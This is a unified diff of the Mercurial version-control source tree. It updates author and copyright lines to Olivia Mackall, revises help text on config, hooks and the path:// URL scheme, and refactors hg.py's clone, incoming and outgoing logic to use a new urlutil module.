+++ b/mercurial/filesetlang.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# filesetlang.py - parser, tokenizer and utility for file set language
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/formatter.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/formatter.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# formatter.py - generic output formatting for mercurial
#
-# Copyright 2012 Matt Mackall <mpm@selenic.com>
+# Copyright 2012 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -178,6 +178,11 @@
class baseformatter(object):
+
+ # set to True if the formater output a strict format that does not support
+ # arbitrary output in the stream.
+ strict_format = False
+
def __init__(self, ui, topic, opts, converter):
self._ui = ui
self._topic = topic
@@ -418,6 +423,9 @@
class jsonformatter(baseformatter):
+
+ strict_format = True
+
def __init__(self, ui, out, topic, opts):
baseformatter.__init__(self, ui, topic, opts, _nullconverter)
self._out = out
--- a/mercurial/grep.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/grep.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# grep.py - logic for history walk and grep
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hbisect.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hbisect.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# changelog bisection for mercurial
#
-# Copyright 2007 Matt Mackall
+# Copyright 2007 Olivia Mackall
# Copyright 2005, 2006 Benoit Boissinot <benoit.boissinot@ens-lyon.org>
#
# Inspired by git bisect, extension skeleton taken from mq.py.
--- a/mercurial/help.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/help.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# help.py - help data for mercurial
#
-# Copyright 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -829,10 +829,11 @@
def appendcmds(cmds):
cmds = sorted(cmds)
for c in cmds:
+ display_cmd = c
if ui.verbose:
- rst.append(b" :%s: %s\n" % (b', '.join(syns[c]), h[c]))
- else:
- rst.append(b' :%s: %s\n' % (c, h[c]))
+ display_cmd = b', '.join(syns[c])
+ display_cmd = display_cmd.replace(b':', br'\:')
+ rst.append(b' :%s: %s\n' % (display_cmd, h[c]))
if name in (b'shortlist', b'debug'):
# List without categories.
--- a/mercurial/helptext/config.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/config.txt Tue Apr 20 11:01:06 2021 -0400
@@ -910,7 +910,8 @@
Repository with this on-disk format require Mercurial version 5.4 or above.
- Disabled by default.
+ By default this format variant is disabled if fast implementation is not
+ available and enabled by default if the fast implementation is available.
``use-share-safe``
Enforce "safe" behaviors for all "shares" that access this repository.
@@ -966,7 +967,7 @@
On some systems, the Mercurial installation may lack `zstd` support.
- Default is `zlib`.
+ Default is `zstd` if available, `zlib` otherwise.
``bookmarks-in-store``
Store bookmarks in .hg/store/. This means that bookmarks are shared when
@@ -1150,7 +1151,7 @@
``pretxnopen``
Run before any new repository transaction is open. The reason for the
transaction will be in ``$HG_TXNNAME``, and a unique identifier for the
- transaction will be in ``HG_TXNID``. A non-zero status will prevent the
+ transaction will be in ``$HG_TXNID``. A non-zero status will prevent the
transaction from being opened.
``pretxnclose``
@@ -1159,12 +1160,13 @@
content or change it. Exit status 0 allows the commit to proceed. A non-zero
status will cause the transaction to be rolled back. The reason for the
transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for
- the transaction will be in ``HG_TXNID``. The rest of the available data will
- vary according the transaction type. New changesets will add ``$HG_NODE``
- (the ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last
- added changeset), ``$HG_URL`` and ``$HG_SOURCE`` variables. Bookmark and
- phase changes will set ``HG_BOOKMARK_MOVED`` and ``HG_PHASES_MOVED`` to ``1``
- respectively, etc.
+ the transaction will be in ``$HG_TXNID``. The rest of the available data will
+ vary according the transaction type. Changes unbundled to the repository will
+ add ``$HG_URL`` and ``$HG_SOURCE``. New changesets will add ``$HG_NODE`` (the
+ ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last added
+ changeset). Bookmark and phase changes will set ``$HG_BOOKMARK_MOVED`` and
+ ``$HG_PHASES_MOVED`` to ``1`` respectively. The number of new obsmarkers, if
+ any, will be in ``$HG_NEW_OBSMARKERS``, etc.
``pretxnclose-bookmark``
Run right before a bookmark change is actually finalized. Any repository
@@ -1178,7 +1180,7 @@
will be empty.
In addition, the reason for the transaction opening will be in
``$HG_TXNNAME``, and a unique identifier for the transaction will be in
- ``HG_TXNID``.
+ ``$HG_TXNID``.
``pretxnclose-phase``
Run right before a phase change is actually finalized. Any repository change
@@ -1190,7 +1192,7 @@
while the previous ``$HG_OLDPHASE``. In case of new node, ``$HG_OLDPHASE``
will be empty. In addition, the reason for the transaction opening will be in
``$HG_TXNNAME``, and a unique identifier for the transaction will be in
- ``HG_TXNID``. The hook is also run for newly added revisions. In this case
+ ``$HG_TXNID``. The hook is also run for newly added revisions. In this case
the ``$HG_OLDPHASE`` entry will be empty.
``txnclose``
@@ -1701,7 +1703,8 @@
These symbolic names can be used from the command line. To pull
from ``my_server``: :hg:`pull my_server`. To push to ``local_path``:
-:hg:`push local_path`.
+:hg:`push local_path`. You can check :hg:`help urls` for details about
+valid URLs.
Options containing colons (``:``) denote sub-options that can influence
behavior for that specific path. Example::
@@ -1710,6 +1713,9 @@
my_server = https://example.com/my_path
my_server:pushurl = ssh://example.com/my_path
+Paths using the `path://otherpath` scheme will inherit the sub-options value from
+the path they point to.
+
The following sub-options can be defined:
``pushurl``
--- a/mercurial/helptext/hg-ssh.8.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/hg-ssh.8.txt Tue Apr 20 11:01:06 2021 -0400
@@ -52,7 +52,7 @@
Author
""""""
-Written by Matt Mackall <mpm@selenic.com>
+Written by Olivia Mackall <olivia@selenic.com>
Resources
"""""""""
@@ -64,7 +64,7 @@
Copying
"""""""
-Copyright (C) 2005-2016 Matt Mackall.
+Copyright (C) 2005-2016 Olivia Mackall.
Free use of this software is granted under the terms of the GNU General
Public License version 2 or any later version.
--- a/mercurial/helptext/hg.1.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/hg.1.txt Tue Apr 20 11:01:06 2021 -0400
@@ -6,7 +6,7 @@
Mercurial source code management system
---------------------------------------
-:Author: Matt Mackall <mpm@selenic.com>
+:Author: Olivia Mackall <olivia@selenic.com>
:Organization: Mercurial
:Manual section: 1
:Manual group: Mercurial Manual
@@ -100,7 +100,7 @@
Author
""""""
-Written by Matt Mackall <mpm@selenic.com>
+Written by Olivia Mackall <olivia@selenic.com>
Resources
"""""""""
@@ -112,7 +112,7 @@
Copying
"""""""
-Copyright (C) 2005-2021 Matt Mackall.
+Copyright (C) 2005-2021 Olivia Mackall.
Free use of this software is granted under the terms of the GNU General
Public License version 2 or any later version.
--- a/mercurial/helptext/hgignore.5.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/hgignore.5.txt Tue Apr 20 11:01:06 2021 -0400
@@ -17,7 +17,7 @@
======
Vadim Gelfer <vadim.gelfer@gmail.com>
-Mercurial was written by Matt Mackall <mpm@selenic.com>.
+Mercurial was written by Olivia Mackall <olivia@selenic.com>.
See Also
========
@@ -26,7 +26,7 @@
Copying
=======
This manual page is copyright 2006 Vadim Gelfer.
-Mercurial is copyright 2005-2021 Matt Mackall.
+Mercurial is copyright 2005-2021 Olivia Mackall.
Free use of this software is granted under the terms of the GNU General
Public License version 2 or any later version.
--- a/mercurial/helptext/hgrc.5.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/hgrc.5.txt Tue Apr 20 11:01:06 2021 -0400
@@ -25,7 +25,7 @@
======
Bryan O'Sullivan <bos@serpentine.com>.
-Mercurial was written by Matt Mackall <mpm@selenic.com>.
+Mercurial was written by Olivia Mackall <olivia@selenic.com>.
See Also
========
@@ -34,7 +34,7 @@
Copying
=======
This manual page is copyright 2005 Bryan O'Sullivan.
-Mercurial is copyright 2005-2021 Matt Mackall.
+Mercurial is copyright 2005-2021 Olivia Mackall.
Free use of this software is granted under the terms of the GNU General
Public License version 2 or any later version.
--- a/mercurial/helptext/urls.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/urls.txt Tue Apr 20 11:01:06 2021 -0400
@@ -5,6 +5,7 @@
http://[user[:pass]@]host[:port]/[path][#revision]
https://[user[:pass]@]host[:port]/[path][#revision]
ssh://[user@]host[:port]/[path][#revision]
+ path://pathname
Paths in the local filesystem can either point to Mercurial
repositories or to bundle files (as created by :hg:`bundle` or
@@ -64,3 +65,12 @@
default-push:
The push command will look for a path named 'default-push', and
prefer it over 'default' if both are defined.
+
+These alias can also be use in the `path://` scheme::
+
+ [paths]
+ alias1 = URL1
+ alias2 = path://alias1
+ ...
+
+check :hg:`help config.paths` for details about the behavior of such "sub-path".
--- a/mercurial/hg.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hg.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# hg.py - repository classes for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
@@ -32,6 +32,7 @@
error,
exchange,
extensions,
+ graphmod,
httppeer,
localrepo,
lock,
@@ -55,6 +56,7 @@
from .utils import (
hashutil,
stringutil,
+ urlutil,
)
@@ -65,7 +67,7 @@
def _local(path):
- path = util.expandpath(util.urllocalpath(path))
+ path = util.expandpath(urlutil.urllocalpath(path))
try:
# we use os.stat() directly here instead of os.path.isfile()
@@ -131,13 +133,9 @@
def parseurl(path, branches=None):
'''parse url#branch, returning (url, (branch, branches))'''
-
- u = util.url(path)
- branch = None
- if u.fragment:
- branch = u.fragment
- u.fragment = None
- return bytes(u), (branch, branches or [])
+ msg = b'parseurl(...) moved to mercurial.utils.urlutil'
+ util.nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.parseurl(path, branches=branches)
schemes = {
@@ -152,7 +150,7 @@
def _peerlookup(path):
- u = util.url(path)
+ u = urlutil.url(path)
scheme = u.scheme or b'file'
thing = schemes.get(scheme) or schemes[b'file']
try:
@@ -177,7 +175,7 @@
def openpath(ui, path, sendaccept=True):
'''open path with open if local, url.open if remote'''
- pathurl = util.url(path, parsequery=False, parsefragment=False)
+ pathurl = urlutil.url(path, parsequery=False, parsefragment=False)
if pathurl.islocal():
return util.posixfile(pathurl.localpath(), b'rb')
else:
@@ -265,7 +263,7 @@
>>> defaultdest(b'http://example.org/foo/')
'foo'
"""
- path = util.url(source).path
+ path = urlutil.url(source).path
if not path:
return b''
return os.path.basename(os.path.normpath(path))
@@ -284,7 +282,7 @@
# the sharedpath always ends in the .hg; we want the path to the repo
source = repo.vfs.split(repo.sharedpath)[0]
- srcurl, branches = parseurl(source)
+ srcurl, branches = urlutil.parseurl(source)
srcrepo = repository(repo.ui, srcurl)
repo.srcrepo = srcrepo
return srcrepo
@@ -307,11 +305,10 @@
if not dest:
dest = defaultdest(source)
else:
- dest = ui.expandpath(dest)
+ dest = urlutil.get_clone_path(ui, dest)[1]
if isinstance(source, bytes):
- origsource = ui.expandpath(source)
- source, branches = parseurl(origsource)
+ origsource, source, branches = urlutil.get_clone_path(ui, source)
srcrepo = repository(ui, source)
rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None)
else:
@@ -571,7 +568,7 @@
# Resolve the value to put in [paths] section for the source.
if islocal(source):
- defaultpath = os.path.abspath(util.urllocalpath(source))
+ defaultpath = os.path.abspath(urlutil.urllocalpath(source))
else:
defaultpath = source
@@ -674,150 +671,158 @@
"""
if isinstance(source, bytes):
- origsource = ui.expandpath(source)
- source, branches = parseurl(origsource, branch)
+ src = urlutil.get_clone_path(ui, source, branch)
+ origsource, source, branches = src
srcpeer = peer(ui, peeropts, source)
else:
srcpeer = source.peer() # in case we were called with a localrepo
branches = (None, branch or [])
origsource = source = srcpeer.url()
- revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs)
+ srclock = destlock = cleandir = None
+ destpeer = None
+ try:
+ revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs)
- if dest is None:
- dest = defaultdest(source)
- if dest:
- ui.status(_(b"destination directory: %s\n") % dest)
- else:
- dest = ui.expandpath(dest)
+ if dest is None:
+ dest = defaultdest(source)
+ if dest:
+ ui.status(_(b"destination directory: %s\n") % dest)
+ else:
+ dest = urlutil.get_clone_path(ui, dest)[0]
- dest = util.urllocalpath(dest)
- source = util.urllocalpath(source)
+ dest = urlutil.urllocalpath(dest)
+ source = urlutil.urllocalpath(source)
- if not dest:
- raise error.InputError(_(b"empty destination path is not valid"))
+ if not dest:
+ raise error.InputError(_(b"empty destination path is not valid"))
- destvfs = vfsmod.vfs(dest, expandpath=True)
- if destvfs.lexists():
- if not destvfs.isdir():
- raise error.InputError(_(b"destination '%s' already exists") % dest)
- elif destvfs.listdir():
- raise error.InputError(_(b"destination '%s' is not empty") % dest)
+ destvfs = vfsmod.vfs(dest, expandpath=True)
+ if destvfs.lexists():
+ if not destvfs.isdir():
+ raise error.InputError(
+ _(b"destination '%s' already exists") % dest
+ )
+ elif destvfs.listdir():
+ raise error.InputError(
+ _(b"destination '%s' is not empty") % dest
+ )
- createopts = {}
- narrow = False
-
- if storeincludepats is not None:
- narrowspec.validatepatterns(storeincludepats)
- narrow = True
+ createopts = {}
+ narrow = False
- if storeexcludepats is not None:
- narrowspec.validatepatterns(storeexcludepats)
- narrow = True
+ if storeincludepats is not None:
+ narrowspec.validatepatterns(storeincludepats)
+ narrow = True
+
+ if storeexcludepats is not None:
+ narrowspec.validatepatterns(storeexcludepats)
+ narrow = True
- if narrow:
- # Include everything by default if only exclusion patterns defined.
- if storeexcludepats and not storeincludepats:
- storeincludepats = {b'path:.'}
+ if narrow:
+ # Include everything by default if only exclusion patterns defined.
+ if storeexcludepats and not storeincludepats:
+ storeincludepats = {b'path:.'}
- createopts[b'narrowfiles'] = True
+ createopts[b'narrowfiles'] = True
- if depth:
- createopts[b'shallowfilestore'] = True
+ if depth:
+ createopts[b'shallowfilestore'] = True
- if srcpeer.capable(b'lfs-serve'):
- # Repository creation honors the config if it disabled the extension, so
- # we can't just announce that lfs will be enabled. This check avoids
- # saying that lfs will be enabled, and then saying it's an unknown
- # feature. The lfs creation option is set in either case so that a
- # requirement is added. If the extension is explicitly disabled but the
- # requirement is set, the clone aborts early, before transferring any
- # data.
- createopts[b'lfs'] = True
+ if srcpeer.capable(b'lfs-serve'):
+ # Repository creation honors the config if it disabled the extension, so
+ # we can't just announce that lfs will be enabled. This check avoids
+ # saying that lfs will be enabled, and then saying it's an unknown
+ # feature. The lfs creation option is set in either case so that a
+ # requirement is added. If the extension is explicitly disabled but the
+ # requirement is set, the clone aborts early, before transferring any
+ # data.
+ createopts[b'lfs'] = True
- if extensions.disabled_help(b'lfs'):
- ui.status(
- _(
- b'(remote is using large file support (lfs), but it is '
- b'explicitly disabled in the local configuration)\n'
+ if extensions.disabled_help(b'lfs'):
+ ui.status(
+ _(
+ b'(remote is using large file support (lfs), but it is '
+ b'explicitly disabled in the local configuration)\n'
+ )
)
- )
- else:
- ui.status(
- _(
- b'(remote is using large file support (lfs); lfs will '
- b'be enabled for this repository)\n'
+ else:
+ ui.status(
+ _(
+ b'(remote is using large file support (lfs); lfs will '
+ b'be enabled for this repository)\n'
+ )
)
- )
- shareopts = shareopts or {}
- sharepool = shareopts.get(b'pool')
- sharenamemode = shareopts.get(b'mode')
- if sharepool and islocal(dest):
- sharepath = None
- if sharenamemode == b'identity':
- # Resolve the name from the initial changeset in the remote
- # repository. This returns nullid when the remote is empty. It
- # raises RepoLookupError if revision 0 is filtered or otherwise
- # not available. If we fail to resolve, sharing is not enabled.
- try:
- with srcpeer.commandexecutor() as e:
- rootnode = e.callcommand(
- b'lookup',
- {
- b'key': b'0',
- },
- ).result()
+ shareopts = shareopts or {}
+ sharepool = shareopts.get(b'pool')
+ sharenamemode = shareopts.get(b'mode')
+ if sharepool and islocal(dest):
+ sharepath = None
+ if sharenamemode == b'identity':
+ # Resolve the name from the initial changeset in the remote
+ # repository. This returns nullid when the remote is empty. It
+ # raises RepoLookupError if revision 0 is filtered or otherwise
+ # not available. If we fail to resolve, sharing is not enabled.
+ try:
+ with srcpeer.commandexecutor() as e:
+ rootnode = e.callcommand(
+ b'lookup',
+ {
+ b'key': b'0',
+ },
+ ).result()
- if rootnode != nullid:
- sharepath = os.path.join(sharepool, hex(rootnode))
- else:
+ if rootnode != nullid:
+ sharepath = os.path.join(sharepool, hex(rootnode))
+ else:
+ ui.status(
+ _(
+ b'(not using pooled storage: '
+ b'remote appears to be empty)\n'
+ )
+ )
+ except error.RepoLookupError:
ui.status(
_(
b'(not using pooled storage: '
- b'remote appears to be empty)\n'
+ b'unable to resolve identity of remote)\n'
)
)
- except error.RepoLookupError:
- ui.status(
- _(
- b'(not using pooled storage: '
- b'unable to resolve identity of remote)\n'
- )
+ elif sharenamemode == b'remote':
+ sharepath = os.path.join(
+ sharepool, hex(hashutil.sha1(source).digest())
+ )
+ else:
+ raise error.Abort(
+ _(b'unknown share naming mode: %s') % sharenamemode
)
- elif sharenamemode == b'remote':
- sharepath = os.path.join(
- sharepool, hex(hashutil.sha1(source).digest())
- )
- else:
- raise error.Abort(
- _(b'unknown share naming mode: %s') % sharenamemode
- )
+
+ # TODO this is a somewhat arbitrary restriction.
+ if narrow:
+ ui.status(
+ _(b'(pooled storage not supported for narrow clones)\n')
+ )
+ sharepath = None
- # TODO this is a somewhat arbitrary restriction.
- if narrow:
- ui.status(_(b'(pooled storage not supported for narrow clones)\n'))
- sharepath = None
+ if sharepath:
+ return clonewithshare(
+ ui,
+ peeropts,
+ sharepath,
+ source,
+ srcpeer,
+ dest,
+ pull=pull,
+ rev=revs,
+ update=update,
+ stream=stream,
+ )
- if sharepath:
- return clonewithshare(
- ui,
- peeropts,
- sharepath,
- source,
- srcpeer,
- dest,
- pull=pull,
- rev=revs,
- update=update,
- stream=stream,
- )
+ srcrepo = srcpeer.local()
- srclock = destlock = cleandir = None
- srcrepo = srcpeer.local()
- try:
abspath = origsource
if islocal(origsource):
- abspath = os.path.abspath(util.urllocalpath(origsource))
+ abspath = os.path.abspath(urlutil.urllocalpath(origsource))
if islocal(dest):
cleandir = dest
@@ -931,7 +936,7 @@
local.setnarrowpats(storeincludepats, storeexcludepats)
narrowspec.copytoworkingcopy(local)
- u = util.url(abspath)
+ u = urlutil.url(abspath)
defaulturl = bytes(u)
local.ui.setconfig(b'paths', b'default', defaulturl, b'clone')
if not stream:
@@ -978,7 +983,7 @@
destrepo = destpeer.local()
if destrepo:
template = uimod.samplehgrcs[b'cloned']
- u = util.url(abspath)
+ u = urlutil.url(abspath)
u.passwd = None
defaulturl = bytes(u)
destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl))
@@ -1055,6 +1060,8 @@
shutil.rmtree(cleandir, True)
if srcpeer is not None:
srcpeer.close()
+ if destpeer and destpeer.local() is None:
+ destpeer.close()
return srcpeer, destpeer
@@ -1114,6 +1121,7 @@
assert stats.unresolvedcount == 0
if show_stats:
_showstats(repo, stats, quietempty)
+ return False
# naming conflict in updatetotally()
@@ -1246,7 +1254,14 @@
def _incoming(
- displaychlist, subreporecurse, ui, repo, source, opts, buffered=False
+ displaychlist,
+ subreporecurse,
+ ui,
+ repo,
+ source,
+ opts,
+ buffered=False,
+ subpath=None,
):
"""
Helper for incoming / gincoming.
@@ -1254,17 +1269,33 @@
(remoterepo, incomingchangesetlist, displayer) parameters,
and is supposed to contain only code that can't be unified.
"""
- source, branches = parseurl(ui.expandpath(source), opts.get(b'branch'))
+ srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch'))
+ srcs = list(srcs)
+ if len(srcs) != 1:
+ msg = _('for now, incoming supports only a single source, %d provided')
+ msg %= len(srcs)
+ raise error.Abort(msg)
+ source, branches = srcs[0]
+ if subpath is not None:
+ subpath = urlutil.url(subpath)
+ if subpath.isabs():
+ source = bytes(subpath)
+ else:
+ p = urlutil.url(source)
+ p.path = os.path.normpath(b'%s/%s' % (p.path, subpath))
+ source = bytes(p)
other = peer(repo, opts, source)
- ui.status(_(b'comparing with %s\n') % util.hidepassword(source))
- revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev'))
+ cleanupfn = other.close
+ try:
+ ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source))
+ revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev'))
- if revs:
- revs = [other.lookup(rev) for rev in revs]
- other, chlist, cleanupfn = bundlerepo.getremotechanges(
- ui, repo, other, revs, opts[b"bundle"], opts[b"force"]
- )
- try:
+ if revs:
+ revs = [other.lookup(rev) for rev in revs]
+ other, chlist, cleanupfn = bundlerepo.getremotechanges(
+ ui, repo, other, revs, opts[b"bundle"], opts[b"force"]
+ )
+
if not chlist:
ui.status(_(b"no changes found\n"))
return subreporecurse()
@@ -1280,7 +1311,7 @@
return 0 # exit code is zero since we found incoming changes
-def incoming(ui, repo, source, opts):
+def incoming(ui, repo, source, opts, subpath=None):
def subreporecurse():
ret = 1
if opts.get(b'subrepos'):
@@ -1304,67 +1335,115 @@
count += 1
displayer.show(other[n])
- return _incoming(display, subreporecurse, ui, repo, source, opts)
+ return _incoming(
+ display, subreporecurse, ui, repo, source, opts, subpath=subpath
+ )
-def _outgoing(ui, repo, dest, opts):
- path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
- if not path:
- raise error.Abort(
- _(b'default repository not configured!'),
- hint=_(b"see 'hg help config.paths'"),
- )
- dest = path.pushloc or path.loc
- branches = path.branch, opts.get(b'branch') or []
+def _outgoing(ui, repo, dests, opts, subpath=None):
+ out = set()
+ others = []
+ for path in urlutil.get_push_paths(repo, ui, dests):
+ dest = path.pushloc or path.loc
+ if subpath is not None:
+ subpath = urlutil.url(subpath)
+ if subpath.isabs():
+ dest = bytes(subpath)
+ else:
+ p = urlutil.url(dest)
+ p.path = os.path.normpath(b'%s/%s' % (p.path, subpath))
+ dest = bytes(p)
+ branches = path.branch, opts.get(b'branch') or []
+
+ ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest))
+ revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev'))
+ if revs:
+ revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)]
- ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
- revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev'))
- if revs:
- revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)]
+ other = peer(repo, opts, dest)
+ try:
+ outgoing = discovery.findcommonoutgoing(
+ repo, other, revs, force=opts.get(b'force')
+ )
+ o = outgoing.missing
+ out.update(o)
+ if not o:
+ scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
+ others.append(other)
+ except: # re-raises
+ other.close()
+ raise
+ # make sure this is ordered by revision number
+ outgoing_revs = list(out)
+ cl = repo.changelog
+ outgoing_revs.sort(key=cl.rev)
+ return outgoing_revs, others
- other = peer(repo, opts, dest)
- outgoing = discovery.findcommonoutgoing(
- repo, other, revs, force=opts.get(b'force')
- )
- o = outgoing.missing
- if not o:
- scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
- return o, other
+
+def _outgoing_recurse(ui, repo, dests, opts):
+ ret = 1
+ if opts.get(b'subrepos'):
+ ctx = repo[None]
+ for subpath in sorted(ctx.substate):
+ sub = ctx.sub(subpath)
+ ret = min(ret, sub.outgoing(ui, dests, opts))
+ return ret
-def outgoing(ui, repo, dest, opts):
- def recurse():
- ret = 1
- if opts.get(b'subrepos'):
- ctx = repo[None]
- for subpath in sorted(ctx.substate):
- sub = ctx.sub(subpath)
- ret = min(ret, sub.outgoing(ui, dest, opts))
- return ret
-
+def _outgoing_filter(repo, revs, opts):
+ """apply revision filtering/ordering option for outgoing"""
limit = logcmdutil.getlimit(opts)
- o, other = _outgoing(ui, repo, dest, opts)
- if not o:
- cmdutil.outgoinghooks(ui, repo, other, opts, o)
- return recurse()
-
+ no_merges = opts.get(b'no_merges')
if opts.get(b'newest_first'):
- o.reverse()
- ui.pager(b'outgoing')
- displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
+ revs.reverse()
+ if limit is None and not no_merges:
+ for r in revs:
+ yield r
+ return
+
count = 0
- for n in o:
+ cl = repo.changelog
+ for n in revs:
if limit is not None and count >= limit:
break
- parents = [p for p in repo.changelog.parents(n) if p != nullid]
- if opts.get(b'no_merges') and len(parents) == 2:
+ parents = [p for p in cl.parents(n) if p != nullid]
+ if no_merges and len(parents) == 2:
continue
count += 1
- displayer.show(repo[n])
- displayer.close()
- cmdutil.outgoinghooks(ui, repo, other, opts, o)
- recurse()
- return 0 # exit code is zero since we found outgoing changes
+ yield n
+
+
+def outgoing(ui, repo, dests, opts, subpath=None):
+ if opts.get(b'graph'):
+ logcmdutil.checkunsupportedgraphflags([], opts)
+ o, others = _outgoing(ui, repo, dests, opts, subpath=subpath)
+ ret = 1
+ try:
+ if o:
+ ret = 0
+
+ if opts.get(b'graph'):
+ revdag = logcmdutil.graphrevs(repo, o, opts)
+ ui.pager(b'outgoing')
+ displayer = logcmdutil.changesetdisplayer(
+ ui, repo, opts, buffered=True
+ )
+ logcmdutil.displaygraph(
+ ui, repo, revdag, displayer, graphmod.asciiedges
+ )
+ else:
+ ui.pager(b'outgoing')
+ displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
+ for n in _outgoing_filter(repo, o, opts):
+ displayer.show(repo[n])
+ displayer.close()
+ for oth in others:
+ cmdutil.outgoinghooks(ui, repo, oth, opts, o)
+ ret = min(ret, _outgoing_recurse(ui, repo, dests, opts))
+ return ret # exit code is zero since we found outgoing changes
+ finally:
+ for oth in others:
+ oth.close()
def verify(repo, level=None):
--- a/mercurial/hgweb/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/__init__.py - web interface to a mercurial repository
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005 Matt Mackall <mpm@selenic.com>
+# Copyright 2005 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hgweb/common.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/common.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/common.py - Utility functions needed by hgweb_mod and hgwebdir_mod
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hgweb/hgweb_mod.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/hgweb_mod.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/hgweb_mod.py - Web interface for a repository.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hgweb/hgwebdir_mod.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/hgwebdir_mod.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/hgwebdir_mod.py - Web interface for a directory of repositories.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hgweb/request.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/request.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/request.py - An http request from either CGI or the standalone server.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -17,6 +17,9 @@
pycompat,
util,
)
+from ..utils import (
+ urlutil,
+)
class multidict(object):
@@ -184,7 +187,7 @@
reponame = env.get(b'REPO_NAME')
if altbaseurl:
- altbaseurl = util.url(altbaseurl)
+ altbaseurl = urlutil.url(altbaseurl)
# https://www.python.org/dev/peps/pep-0333/#environ-variables defines
# the environment variables.
